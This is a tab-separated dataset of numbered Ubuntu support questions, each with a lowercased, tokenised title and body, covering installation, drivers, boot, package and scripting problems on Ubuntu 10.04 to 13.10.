434026	ubuntu 12.04 lts always stuck in login first time , but to recovery screen second time	presently installed ubuntu 12.04 lts as stand alone through usb overwriting older linux versions option . previously installed as dual with windows xp . then for about 7 times as stand alone with custom partitions . used all space for partitions . missing swap problem occurred . once nvidia driver update showed up . when updated screen went reso wrong . so i always avoid nvidia driver update . lastly allowed a lot of free space to avoid bad sectors and installation successful . this time the missing swap area problem is not arising . problem : but always when boot for first time , both mouse and keyboard inactive in login screen . i have to switch off directly and reboot . always for the second time - ubuntu leads to gnu grub recovery option screen . when i choose ( recovery option ) everything properly recovers to a working login screen with activated mouse and keyboard . i am very new to linux and ubuntu , but can follow instructions both terminal and desktop based . i am planning for a big ubuntu awareness program in my area and need help to make myself professional . please do help .
434031	need help installing ubuntu on my laptop	hello i have a laptop with windows 8 . i want to remove windows 8 and install ubuntu but i keep getting stuck . i have ubuntu on a flash drive and cd . i do n't want windows any more on the laptop . any advise . thanks carl
434032	want to know which programs i can safely uninstall if i just use my 12.04 box as headless plex server	i seem to have a ton of stuff unnecessarily loading up with my ubuntu 12.04 box that i just use as a plex media server . i do n't use the graphical element of it at all . i merely just log in ssh when i need to do some work on it . and i use samba too . but it mostly just sits in a corner and used to watch movies and listen to music off of it using my roku and ios devices .
434033	how to encapsulate http in a https session	team , hi , i 'm looking for a solution that would allow me encapsulate incoming http traffic , with https traffic from my application ( http in an iframe ) , and deliver both as https . can squid proxy do that ? thanks etai
434035	ca n't access bios for usb install	i am trying to install ubuntu on my second machine now from a usb startup disk . the disk works fine as i used it yesterday to install on another machine . the problem is on this second ibm machine : when i go to boot menu ( by pressing f12 ) i do not see boot from usb . the only other option that might be similar is removable device . when i select this option and hit enter nothing happens . the light on the usb stick does n't even flash , just my old windows boots up normally . i have been attempting to access the bios , but the only thing i can seem to get access to is the ibm setup utility which seems like the bios , but is n't that blue screen like on my other machine . can anyone please help me figure out how to get this going so i can install ubuntu again ? thanks for your time & consideration mikee
434036	ubuntu html5 app referenceerror : ca n't find variable : tab	following is the code : an ubuntu html5 application < ! -- ubuntu ui style imports - ambiance theme -- > < link href= '' /usr/share/ubuntu-html5-ui-toolkit/0.1/ambiance/css/apptemplate.css '' rel= '' stylesheet '' type= '' text/css '' / > < ! -- ubuntu ui javascript imports - ambiance theme -- > < script src= '' /usr/share/ubuntu-html5-ui-toolkit/0.1/ambiance/js/fast-buttons.js '' > < /script > < script src= '' /usr/share/ubuntu-html5-ui-toolkit/0.1/ambiance/js/core.js '' > < /script > < script src= '' /usr/share/ubuntu-html5-ui-toolkit/0.1/ambiance/js/buttons.js '' > < /script > < script src= '' /usr/share/ubuntu-html5-ui-toolkit/0.1/ambiance/js/dialogs.js '' > < /script > < script src= '' /usr/share/ubuntu-html5-ui-toolkit/0.1/ambiance/js/page.js '' > < /script > < script src= '' /usr/share/ubuntu-html5-ui-toolkit/0.1/ambiance/js/pagestacks.js '' > < /script > < script src= '' /usr/share/ubuntu-html5-ui-toolkit/0.1/ambiance/js/tabs.js '' > < /script > < script src= '' /usr/share/ubuntu-html5-ui-toolkit/0.1/ambiance/js/tab.js '' > < /script > < ! -- cordova platform api access - uncomment this to have access to the javascript apis -- > < ! -- < script src= '' cordova/cordova.js '' > < /script > -- > < ! -- application script -- > < script src= '' js/app.js '' > < /script > < div data-role= '' mainview '' > < header data-role= '' header '' > < ul data-role= '' tabs '' > < li data-role= '' tabitem '' data-page= '' hello-page '' > hello world < /li > < li data-role= '' tabitem '' data-page= '' test-page '' > test me < /li > < /ul > < /header > < div data-role= '' content '' > < ! -- the application main page -- > < div data-role= '' tab '' id= '' hello-page '' > < section data-role= '' list '' > < header class= '' large-font '' > my list header < /header > < ul data-role= '' listview '' id= '' contacts '' > < li > < aside > < img alt= '' placeholder '' src= '' /usr/share/ubuntu-html5-ui-toolkit/0.1/ambiance/img/avatar_contacts_list @ 8.png '' > < /aside > < p > jane < /p > < ! -- a list item side control -- > < label > < input type= '' checkbox '' data-type= '' switch '' > < span class= '' toggle '' > < span class= '' toggle-handle '' > < /span > < span class= '' toggle-bg '' > < /span > < /span > < /label > < /li > < li > < aside > < img alt= '' placeholder '' src= '' /usr/share/ubuntu-html5-ui-toolkit/0.1/ambiance/img/avatar_contacts_list @ 8.png '' > < /aside > < p > mark < /p > < ! -- a list item side control -- > < label > < input type= '' checkbox '' data-type= '' switch '' > < span class= '' toggle '' > < span class= '' toggle-handle '' > < /span > < span class= '' toggle-bg '' > < /span > < /span > < /label > < /li > < li > < aside > < img alt= '' placeholder '' src= '' /usr/share/ubuntu-html5-ui-toolkit/0.1/ambiance/img/avatar_contacts_list @ 8.png '' > < /aside > < p > olivier < /p > < ! -- a list item side control -- > < label > < input type= '' checkbox '' data-type= '' switch '' > < span class= '' toggle '' > < span class= '' toggle-handle '' > < /span > < span class= '' toggle-bg '' > < /span > < /span > < /label > < /li > < /ul > < /section > < div class= '' inset '' style= '' margin-top : 1em ; text-align : center '' > < div style= '' margin : 0em 1em 1em 1em '' > < button id= '' text '' data-role= '' button '' class= '' ubuntu '' style= '' width : 100 % '' > text < /button > < /div > < div style= '' margin : 0em 1em 1em 1em '' > < button id= '' call '' data-role= '' button '' class= '' ubuntu '' style= '' width : 100 % '' > call < span class= '' icon icon-call '' > < /span > < /button > < /div > < /div > < div data-role= '' dialog '' id= '' dialog1 '' > < section > < h1 > < /h1 > < menu > < button data-role= '' button '' id= '' no '' > ok < /button > < /menu > < /section > < /div > < /div > < div data-role= '' tab '' id= '' test-page '' > < button data-role= '' button '' id = `` luck '' > lucky < /button > < /div > < /div > < /div >
434039	gnome-terminal stretch background image to fit window size	is there a way to stretch the selected image in my gnome terminal to fit the current window size ? using gnome-session 3.2.1
434048	how to set bootable usb drive in dell 740	i have used the flash drive and unetbootin to make the bootable usb drive . the pc recognizes the usb but not as bootable .
434050	help ! i ca n't install synaptic in ubuntu 12.04	lenhan @ lenhan-k55a : ~ $ sudo apt-get install synaptic reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : synaptic : depends : libept1.4.12 but it is not installable recommends : rarian-compat but it is not installable e : unable to correct problems , you have held broken packages .
434051	how to replace a string on the 5th line of multiple text files ?	i want to replace the 5th line of multiple text files ( file1.txt , file2.txt , file3.txt , file4.txt ) with the string `` good morning `` using a single terminal command . all the text files are located on my ~/desktop . note : my desktop consists of 6 .txt files.i want to apply the change to above mentioned 4 text files only .
434052	can not detect 'mobilelink ml27 telkomsel flash ' modem in ubuntu 12.04	i am now using the usb modem 'mobilelink hsupa 7.2 mbps model ml27 ' to try to connect to internet in ubuntu 12.04 . however , it can not detect my usb modem and i can not install it following network connections > mobile broadband > add . anyone has the experience using this usb modem ? ( this is brought in indonesia )
434053	how to provide gui interface to all users of ubuntu ?	i have `` ubuntu desktop '' installed in virtualbox in a windows 7 pc . how can i configure it to provide a gui interface to every user i create in the ubuntu ? should i install `` ubuntu server '' to accomplish this ? can this be done in ubuntu ? i remember working in a place where solaris was installed in a server and every user used to login using cygwin and get a solaris gui desktop . can this be done ? and what is this feature called ? i am asking this for an event for the following purpose . i want to install ruby on rails in an ubuntu machine and create 5 users in the ubuntu . these 5 users will have their own windows 7 laptops . these 5 users should be able to get their own gui desktop on their windows 7 laptop . and can this be done by installing ubuntu in virtual box in a windows 7 pc ? please help .
434054	any reason why ubuntu 's man page on crontab ( 5 ) is less informative ?	why is the man page for crontab ( 5 ) at manpages.ubuntu.com less informative than corresponding man page at linux.die.net ? compare the `` sixth '' field ( the rest of the line ) specifies the command to be run . the entire command portion of the line , up to a newline or % character , will be executed by /bin/sh or by the shell specified in the shell variable of the cronfile . percent-signs ( % ) in the command , unless escaped with backslash ( ) , will be changed into newline characters , and all data after the first % will be sent to the command as standard input . from the linux.die.net link and the `` sixth '' field ( the rest of the line ) specifies the command to be run . the entire command portion of the line will be executed by /bin/sh or by the shell specified in the shell variable of the cronfile . from the manpages.ubuntu.com link . i should mention that the info page about crontab ( 5 ) on my 13.10 does include this information . info crontab\ ( 5\ ) show me this : and notice that info : ( *manpages* ) crontab ( 5 ) is present in the bar at the bottom .
434060	huwai 1731 ( mobile broadband ) not working with dell inspiron 3521	please help , one of my friend shared this note ( enclosed below ) , i used these codes and my laptop is able open the data card but i am not getting any signals . i am able to work with wired connection , but wi-fi and mobile broad band are not working . please help . sudo apt-get purge usb-modeswitch sudo apt-get update sudo spt-get install usb-modeswitch sudo apt-get update gksudo gedit /lib/udev/rules.d/40-usb_modeswitch.rules once you enter these above commands 40-usb_modeswitch.rules text file will open . then , copy below mentioned lines into 40-usb_modeswitch.rules text file . # huawei e1731 attrs { idvendor } == '' 12d1 '' , attrs { idproduct } == '' 1446 '' , run+= '' usb_modeswitch ' % b/ % k ' '' save the file then type : sudo apt-get update then restart the machine .
434061	hide `` places '' or `` username '' in file chooser dialog	background making a video-capture of a website demo ; part of the demo requires uploading files . problem the username is displayed in the video , which is a security concern . question how do you configure the gtk file chooser to : hide the `` places '' list ; hide the username ; or change the username to `` home '' ? related related information : http : //stackoverflow.com/questions/6625609/customizing-gtkfilechooser https : //people.gnome.org/~federico/docs/file-chooser-extension-spec/index.html # scenario-lockdown
434062	i installed ubuntu 13.04 i ca n't find the terminal and which is better gnome or kde ?	i installed ubuntu 13.04 . i ca n't find the terminal ? one more thing which is better gnome or kde ? i like to work in node.js and photoshop .
434063	how do i get a dell u2414h monitor and nvidia nvs300 working ?	i ca n't get ubuntu 12.04 lts to run xwindows in my monitors native resolution . i have a dell u2414h monitor and nvidia nvs 300 video card . i am connected via a single link dvi to hdmi cable . when i first booted to gnome3 the monitor was running at 800x600 stretched . it only had the option to do 800x600 and 640x480 in the settings panel . then i uninstalled all the nvidia proprietary drivers from recovery mode and overwrote my xorg.conf with a file i saw in there that was xorg.conf.failsafe . now when i boot up without the nvidia drivers now i end up in the commandline but it looks like the correct native resolution of 1920x1080 . when i try to run startx it fails and the log says `` screen ( s ) found , but none have a usable configuration . '' what should i do ? should i try reinstalling an nvidia driver , which one ? i see 334.21 and 331.49 . something else ?
434064	is that possible to cut down the terminal prompt text ?	while opening my gnome-terminal , it looks like this avi @ avi-lenovo-ideapad-z500 : ~ $ i want to cutdown the prompt text and make it to appear like this , z500 : ~ $ is that possile ? if yes , then how ?
434065	loaded ubuntu 13.10 on mac	i 've installed ubuntu 13.10 both on a seperate partition and alongside osx on my mac and whenever i have to restart at the end of the installation , it get : gnu grub version 2.00-19ubuntu2.1 minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . grub > what now ? !
434066	how to transfer music and files from ubuntu 13.10 to android 4.3 ?	i 'm trying to transfer files and music from my computer with ubuntu 13.10 to my samsung smartphone s3 android version 4.3 with no success . can someone please help me and guide me through the steps to do so ?
434072	is photoshop free for linux ? or any payable version of photoshop available for linux ?	is photoshop free for linux ? or any payable version of photoshop available for linux ? because i 'm not familiar with gimp like software .
434073	trendnet tew-664ub not recognized in ubuntu	i just installed a ubuntu system on my computer and its not working with my trendnet tew 664-ub ( the device works fine in windows 7 ) . at first i thought this was a driver issue so i tried ndiswrapper , however , when i type in lsusb in terminal it does n't show a trendnet usb , it only shows the keyboard and mouse attached to it . so what can i do to get my wireless adapter working on ubuntu ?
434075	how to change window opacity dynamically in python and quickly ?	the app is written in html and is running using webkit and quickly . the opacity can be changed using glade . i want to add a slider functionality in html which will change the title of the html document according to the opacity . how to code the main app/appwindow.py so that it will change the opacity dynamically according to the html document title ?
434077	how to start interactive shell during shutdown ?	i want to start a shell after /etc/init.d/umountroot stop . i tried : /bin/bash < /dev/console > /dev/console 2 > & 1 but it 's detached from tty and typing in it is unreliable .
434081	camera 's pts and dts jumps issue	i use ffmpeg library in my code for capturing rtsp streams from cameras and writing in flv . if i capture streams from only one camera and camera has only video stream then there 's no any errors , i got first packet with pts and dts 1698557894 and other packets ' pts and dts slowly increases . but if camera has video and audio streams , then strange things occur . for example , video packets pts and dts begin with 1698557894 and slowly increase , and audio starts with 0 then slowly increases and after ~50 packets jumps to value 151004317 and slowly increase . another situation , when audio begins with 0 and slowly increases , and video begins from 1785662594 and after ~70 packets jumps to 234722 and slowly increase . such behaviour do not allow flv segment muxer to write files , it just returns some einval value . also if i try to capture streams from two cameras , first camera has only video and another has video and audio , then first camera packets ' pts and dts are ok . but another camera has video and audio pts/dts values which are very different . av_read_frame returns video packet with pts/dts value 1811924055 , which rescales to 557003451 in flv muxer and audio 4456027604 , which rescales to 557003451 , but these values must be almost equal ! so , the questions are : 0 ) why do these jumps occur in the beginning of capturing ? is it a problem with camera or it is just some ffmpeg issue ? 1 ) can such jump occur after some long period ? how i should handle it ? 2 ) why camera 's video and audio have so different pts/dts values ?
434082	error writing on apache2	i 've problem when i want to write on apache2 $ nano /etc/apache2/sites-available/default error writing /etc/apache2/sites-available/default : permission denied i 've installed sudo a2enmod rewrite ; sudo a2enmod headers but the result still error : permission denied . anyone have trouble same with me , can share to fix it . thanks advanced .
434083	errors when i try to install synaptic manager	on installation : enhan @ lenhan-k55a : ~ $ sudo apt-get install synaptic reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : synaptic : depends : libept1.4.12 but it is not installable recommends : rarian-compat but it is not installable e : unable to correct problems , you have held broken packages . updated sources list : lenhan @ lenhan-k55a : ~ $ sudo mv /var/lib/apt/lists /var/lib/apt/lists.old & & sudo apt-get update [ sudo ] password for lenhan : reading package lists ... done lenhan @ lenhan-k55a : ~ $ sudo apt-get install synaptic reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : synaptic : depends : libept1.4.12 but it is not installable recommends : rarian-compat but it is not installable e : unable to correct problems , you have held broken packages . tried fixing dependencies with apt-get -f install lenhan @ lenhan-k55a : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : gir1.2-ubuntuoneui-3.0 libraw5 libgexiv2-1 libubuntuoneui-3.0-1 libexiv2-11 thunderbird-globalmenu use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . lenhan @ lenhan-k55a : ~ $ sudo dpkg -- configure -a tried installing it again : lenhan @ lenhan-k55a : ~ $ sudo apt-get install synaptic reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : synaptic : depends : libept1.4.12 but it is not installable recommends : rarian-compat but it is not installable e : unable to correct problems , you have held broken packages . the following packages have unmet dependencies : synaptic : depends : libept1.4.12 but it is not installable recommends : rarian-compat but it is not installable e : unable to correct problems , you have held broken packages .
434094	log files prevent clean root umount	my root fs is always dirty after shutdown . to see why , i added a couple of lines into /etc/init.d/umountroot : /usr/bin/lsof / | /usr/bin/awk ' $ 4 ~ / [ 0-9 ] . *w/' ... mount -o remount , ro ... /bin/bash < /dev/console > /dev/console 2 > & 1 here 's the output : if i create a symlink : /var/log/upstart/mountall.log - > /dev/null and manually kill dhclient before shutdown , the problem goes away . ``
434097	vm guest windows xp not running ubuntu wubi install	so i installed windows xp in virtualbox , installed ubuntu 12.04.4 lts within that using wubi , but when i go to reboot , after selecting ubuntu in mbr os select ( i believe that 's the name ) , i get this error and a blackscreen after a second . try ( hd0,0 ) : ntfs5 : error : `` prefix '' not set
434100	black screen after installing ubuntu 13.10 alongside windows 8	i am completely new to ubuntu ( linux ) . i installed 12.04 alongside windows 8 first . it installed perfectly . then someone told me to install 13.10 instead so i installed 13.10 over it . it installed without any problem . but when i rebooted my laptop after the installation , it got stuck on a black screen with a flashing cursor on it . i tried everything on many forums but i could n't solve the problem as all of them confused me ... can anybody help me ? p.s . : i have tried boot-repair . it still does n't work .
434104	forwarding gnu screen notification to ubuntu desktop	gnu screen has utility of monitoring window activity . is it possible to forward the notification of gnu screen to ubuntu desktop environment ? for example , when gnu screen generates a notification , urgent animation in unity panel is triggered or sound is played on my host , etc .
434106	keyboard layout changes after reboot to us	since a few weeks ago my keyboard settings keep changing to us after every reboot . i only have the slovenian keyboard settings . removed the us after installing the system months ago . my system : ubuntu 13.10 64-bit , amd a6-3650 apu with radeon ( tm ) , 8gb on ram my locale : locale lang=en_gb.utf-8 language=en_gb : en lc_ctype= '' en_gb.utf-8 '' lc_numeric= '' en_gb.utf-8 '' lc_time= '' en_gb.utf-8 '' lc_collate= '' en_gb.utf-8 '' lc_monetary= '' en_gb.utf-8 '' lc_messages= '' en_gb.utf-8 '' lc_paper= '' en_gb.utf-8 '' lc_name= '' en_gb.utf-8 '' lc_address= '' en_gb.utf-8 '' lc_telephone= '' en_gb.utf-8 '' lc_measurement= '' en_gb.utf-8 '' lc_identification= '' en_gb.utf-8 '' lc_all=
434107	using an already setup raid 1 array on ubuntu 12.04	i have just installed ubuntu 12.04lts on a separate hdd to dual boot with window 7 x64 . my windows install is on an ssd and my system includes two 3tb seagate drives in raid 1 . raid is provided by the motherboard 's intel chipset . the ssd is on a different sata chip by asmedia . the mobo is an asrock z77-pro4 . in windows , i have the intel storage software that checks the raid array for synch problems and any other issues . this works fine . what i would like to ask is whether that same raid array can be seen as one drive from ubuntu . as it stands , ubuntu recognises that i have two separate 3tb hdd , named /sda and /sdb . is there a way for ubuntu to recognise that both these drives are in fact supposed to be seen as one and keep them in sync if i change or update something in one of them ? will the change be reflected in both of them once the array is accessed through windows ? thank you for any help .
434108	delta 66 sound issue after suspend	recently found that when i go to the suspend menu up the top right corner , the sound from my m audio delta 66 stops working . the levels can be seen functioning in the envy24 control utility panel . if i switch to default computer speaker in system sound settings the sound comes out there as well . the only workaround is for me to reboot the system . any help would be greatly appreciated . thank you mikee
434111	how to keep a maximum of 79 characters per line in case of python list comprehensions ?	i have function which consists of 1 line . it is something like : return [ item for item in list if something_very_long and something_else_very_long ] == [ ] how is it most appropriate to separate this statement to adhere to pep-8 guidelines of keeping a maximum of 79 characters per line ? i could n't find an example like this in pep-8 documentation .
434113	a good program for only text animation	is there a good program for text animation , like aftereffects ? i would like to create some animations like this : http : //www.youtube.com/watch ? v=p5_wkm7s5u0 or http : //www.youtube.com/watch ? v=zlttmnsniri is there an equivalent software for linux ? thanks u beforehand
434116	how to create a domain with apache2 lamp	i want to create a mail server for which a domain is required . i want to access a particular directory in www folder with a domain name instead of writing www/foldername . can i do this ? ? i tried this : - # setup `` foldername.tld '' virtual host < virtualhost *:80 > servername foldername.tld documentroot /home/user/var/www/foldername < directory /home/user/var/www/foldername > options indexes followsymlinks includes allowoverride all order allow , deny allow from all < /directory > < /virtualhost > i created a file called foldername.tld in /etc/apache2/sites-available/ . i am using ubuntu 12.04 lts . please help me out .
434121	how to know if the os is desktop or server version	we have both ubuntu 12.04 lts server and desktop editions installed in office . how do i know if the installed ubuntu was server or desktop edition ( forget gui as all are cli ) . uname -a and lsb-release or os-release just do n't help you identify it . i have seen a post on this forum but its 3 years old which tell you to identify from kernel but as far as i remember , from 12.04 edition onwards ubuntu used same kernel for both desktop and server editions so whats left to identify .
434122	how to create a capture button in a usb webcam using gtk in a c program ?	i am working on a multimedia project where i have to create a capture button in a usb webcam , and when the capture button is clicked every picture will be saved in another window . guys please help me .
434126	how to know the time/date of when the packages are installed ?	i installed and removed so many packages on my system.but it do n't know when it was installed and when it was removed . i want to know when the packages are installed on my pc .
434129	why does gearman-job-server not accept connections when running as a service ?	on ubuntu 12.04 , if i run sudo gearmand -d , the manager will accept jobs from remote machines . however , if i run sudo service start gearman-job-server ( after killing gearmand ) , remote connections are refused . where should i look for why this is happening and / or how can i resolve it ? gearman version is 1.0.6
434131	how to install ubuntu mate and ligthdm	i have a fresh installation of ubuntu server 32bit on my virtualbox environment and i would like to install mate with lightdm . i did the following process : add the deb http : //repo.mate-desktop.org/ubuntu raring main to /etc/apt/sources.list sudo apt-get update sudo apt-get -- yes -- quiet -- allow-unauthenticated install mate-archive-keyring sudo apt-get update sudo apt-get install mate-core sudo apt-get install mate-desktop-environment-extra sudo apt-get install lightdm sudo reboot and everything went great . but after reboot i am greeted with a login window but after i login with username and password it does nothing , just freezes . is there something i must do in order for this to work ?
434132	adjust screen brightness in ubuntu 12.04 lts ( packard bell easynote r4622 laptop )	i have a packard bell r4622 laptop running ubuntu 12.04 lts 32 bit . i turned the brightness down with the function keys because the screen was too bright , but now it is too dark and i can not turn it back up again ! i have tried installing xbrightness and adjusting the brightness in the ubuntu system setting but either work . any help would be appreciated . thanks . **extra info : i have not changed my graphic drivers . i am using the ones provided by ubuntu . if ubuntu does n't supply new graphic drivers on installation , i am using the ones provided with my pc . **
434134	what command is thunar using to mount usb device ?	i set up rsync as an hourly cron job to back up data to an external usb device which is always plugged into my machine . i see that thunar ( version 1.6.3 / xubuntu 13.10 ) can mount this device when i just click on it in the left pane of the file manager under devices . i can also right-click to `` eject '' it . i want to know the actual command thunar uses to mount/unmount the device without needing sudo . then i can put the same command in autostart so that rsync can do its work . now , if i forget to mount the usb device , rsync wo n't do the backup .
434135	how can you make the system print dialogue default in chrome ?	chrome has its custom feature-limited print dialogue which i always skip in order to use the system print dialogue . is it possible to make the system print dialogue default ?
434136	restoring deja-dup backups from hdd on windows ( individual files ore a collection of files )	this question has been asked before but not in way that answered my question okey doley so with the details i have backed up all my files using deja dup ( aka default backup application in ubuntu 13.10 ... i think ) i plan to format and repartition the drove on my laptop obviously i plan the partition to be the system drive for windows and my programs but i have lots of files like anime etc ( btw i have the drivers already ) how can i restore just these files in my new windows environment .. ( can you please be as specific as possible i 'm not the best with computers ) ... thank you in advance .
434137	is there an exposăš like window overview feature in xubuntu ?	using ubuntu with unity and compiz it was possible for me to create a hot corner which triggered all ( in- ) active windows to be shown in an overview . is it possible to create something similar in xubuntu ?
434142	processing - /usr/lib/cups/filter/hpcups failed	i am running ubuntu 13.10 on my laptop at work and can not manage to have our printer to work . setting up the printer either with the gui or with cups ( webbrowser ) is working fine but no chance with printing anything since i get the error message '' processing - /usr/lib/cups/filter/hpcups failed '' background : the print server we have is running opensuse with cups 1.5.4 my saucy ubuntu has cups 1.7rc1 the it here want to mess with my computer and downgrade cups to 1.5.4 ... : -/ i already tried to reinstall all cups , hplip , and various dependencies with no luck ... and tried using different driver versions any suggestions ? thanks a lot
434147	how to fix this installation error	i am trying to install ubuntu 13.10 64bit from a usb stick ( i created the liveusb as in the official documentation on ubuntu site and it gave me no errors ) on my pc . everything goes well before the ubuntu splash screen , but the splash screen stays forever . then i tried booting with parameters like nomodeset noacpi etc . but that did n't work too . i tried making different flash drives and checked md5 file of the iso image with the one on ubuntu official site everything is ok. then i tried booting with noquiet and nosplash options and saw this in terminal : begin : mounting root file system ... begin : running /casper-premount ... done calling : test-builtin error reading /lib/udev/hwdb.bin : no such file or directory load module index unload module index usb 1-5 : reset high speed usb device using ehci_hcd and address 3 usb 1-5 : reset high speed usb device using ehci_hcd and address 3 usb 1-5 : reset high speed usb device using ehci_hcd and address 3 usb 1-5 : reset high speed usb device using ehci_hcd and address 3 the last line endlessly repeats in 4-5 seconds . i used to install ubuntu 9.04-11.10 before and everything was ok then . what could be the problem ?
434150	is lsblk not available for ubuntu10.04 ?	i tried to install lsblk , but i got this error message : # apt-get install lsblk reading package lists ... done building dependency tree reading state information ... done e : could n't find package lsblk i am using ubuntu server 10.04 64-bit . if lsblk is not available then what is the best substitution for it ?
434153	echo command with color option in script and command works differently	if i run echo -e `` \e [ 1 ; 31mthis is red text\e [ 0m '' in comand line , it prints out red text . however , if i use write it in script file test.sh # ! /bin/bash echo -e `` \e [ 1 ; 31mthis is red text\e [ 0m '' run $ sh test.sh it prints out -e \e [ 1 ; 31mthis is red text\e [ 0m why they act differntly ?
434154	how to get the list of installed library packages only ?	i want to get the list of installed library packages only from terminal . is there any command for that ?
434155	how do i make the shell to recognize the file names returned by a `ls -a` command , and these names contain spaces ?	this is the part of the script i am using to rename the files returned by ls -a : for file in `ls -a` do ext= $ { file # # * . } num= $ ( ( $ num+1 ) ) newfile=`echo $ 2_ $ num. $ ext | sed 's/ /_/g'` mv `` $ file '' `` $ newfile '' done but can not find names with space ! the $ 2 parameter can not be the cause of the error why i ever step a name without a space as a parameter , and this script takes that name and rename all files in the folder so to let them numbered and does not modify the file extension . unfortunately it does not rename files with spaces in the name . can someone help me ?
434161	qt creator 3.0.1 unable to initialize glx on ubuntu 12.10 64 bit	my os is ubuntu 12.10 64 bit . when i run qtcreator-3.0.1.run file i am getting the following error : xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . could not initialize glx
434163	how to download file on ubuntu server	i want to download files from torrent to my ubuntu server . i want to install utorrent and download files using torrent . i wan na know if it is possible ? i want to download that files on my server directly so i can share them with download link directly . if it is possible then how will i be able ti get link for that file to share it for downlaod ? can we do the same using any contropanel ? do n't think so . i just want to save those file downloaded from torrent to my server and share their download link to people . please tell me ow is it possible . i am asking this because i do n't want to download the files first on my computer than upload it to server .
434164	dell vostro 2420 wireless connection not happening	i am using ubuntu 12.04 , x86_64 architecture . the wireless stopped working suddenly . wireless option is there but it is greyed out . can anyone help me fix it ? this is the output of lspci command : $ lspci -nn | grep 0280 07:00.0 network controller [ 0280 ] : broadcom corporatie on bcm43142 802.11b/g/n [ 14e4:4365 ] ( rev 01 ) i have also executed the following commands , but it made no difference . the wireless is still greyed out sudo apt-get install linux-headers-generic sudo apt-get install bcmwl-kernel-source sudo modprobe wl output for rfkill $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no 2 : dell-wifi : wireless lan soft blocked : yes hard blocked : yes 3 : dell-bluetooth : bluetooth soft blocked : yes hard blocked : yes
434172	how to mount novell share ?	i would like to mount netware service on my linux . could someone give me example how such a line should looks like in fstab ?
434173	when/why do i need to make/install linux headers ?	the use case is installing ubuntu core to run as an appliance . the machine : will run a single task , is preferably slimmed down to have low disk space consumption , has the ( custom ) kernel installed via a .deb file ( not the `` linux '' meta package ) the kernel compile make-kpkg command suggest to include kernel_headers . but why and/or when do i really need ( or is it wise ) to make and/or install linux headers ( package ) ?
434175	moving files from several subdirs to a main dir	so i recovered all the files that were still available on a corrupted external drive using testdisk . now i want to sort out the different file extensions and copy them to their respective newly created main directories ( .jpg / .doc / .xls etc ... ) after some looking around i found that the following entry in the commandline should do the trick , however i get a message stating there is a missing argument for -exec , meaning i am actually stuck . any input ? find /media/drive-n-go/backup\ wiebe/ -type f -name *.jpg -exec cp { } /media/elements/jpgs/ \
434185	can i configure ubuntu to remove apt-get and dpkg ?	i need to completely remove any methods for making changes to my system . is there a way to remove apt-get and dpkg ? is it possible to also disallow changing executable bit to any files copied into my system ? can this be done with a mask ?
434186	ubuntu 13.10 and dac problems	i am a new ubuntu user and i love it . but i can not get the os to recognize when i plug in my fiio e7 digital audio converter . hdmi is no problem to out put sound but it will not recognize my dac . please help !
434193	while reading the archive error occurred	archive : /media/g71-mid1019/dvdsetup.exe [ /media/g71-mid1019/dvdsetup.exe ] end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /media/g71-mid1019/dvdsetup.exe or /media/g71-mid1019/dvdsetup.exe.zip , and can not find /media/g71-mid1019/dvdsetup.exe.zip , period .
434196	can not acess my own username directory	my directory root is : $ home/pk the problem is that i 'm unable to enter into home directory . when i type commend cd /pk , it gives an error , saying file or directory not found . when i type -ls command on terminal , it shows pk directory . how can i access my home directory ?
434206	why/what is ubuntu auto sync ( ing ) when i connect my iphone via usb , hard drive temporarily full	i have 2.7 gb free on / . when i connected my iphone ( just for charging reasons ) , after a short time the system gave me a message there are only 7 mb left on your ... when i disconnected the phone and rebooted , the space ( 2.x gb ) was there again . does anyone have an explanation for this ? is my phone/ubuntu somehow automatically syncing something ( e.g . pictures or audio books ) if so how can i turn it off . i just want to charge the phone .
434207	can i use gtk+ stock icons in a free closed source business application ?	if so , have i to indicate anything in license ( classical `` about '' window ) ?
434208	can i convert the guest os to main os ?	i have ubuntu 12.04 installed on my computer and windows xp as guest os using virtual box . can i change the main os to xp without having to format ubuntu and installing windows xp ?
434212	using gparted to create more than 4 partitions ?	i 've created a bootable usb and i 'm getting ready to install ubuntu 13.10 to dual-boot with windows 7 . the problem is i do n't know how to deal with my partitions . i have 4 primary partitions on my hdd already ( recovery , boot , and 2 that are unnamed and i ca n't explore ) . which one of the latter 2 would i use to create an extended partition with unallocated space using gparted ? ? how do i find out . i 've been googling this for hours and i just do n't know how to do this in an informed manner and safely . i just ca n't find the answer . thanks to all that can help ! ! update : ok looking at it from the linux end the last two are hidden partitions and i can see that they are not empty . one is called hddrecovery . not sure how to proceed . can i back up the files in those partitions and then extend one and delete the other ?
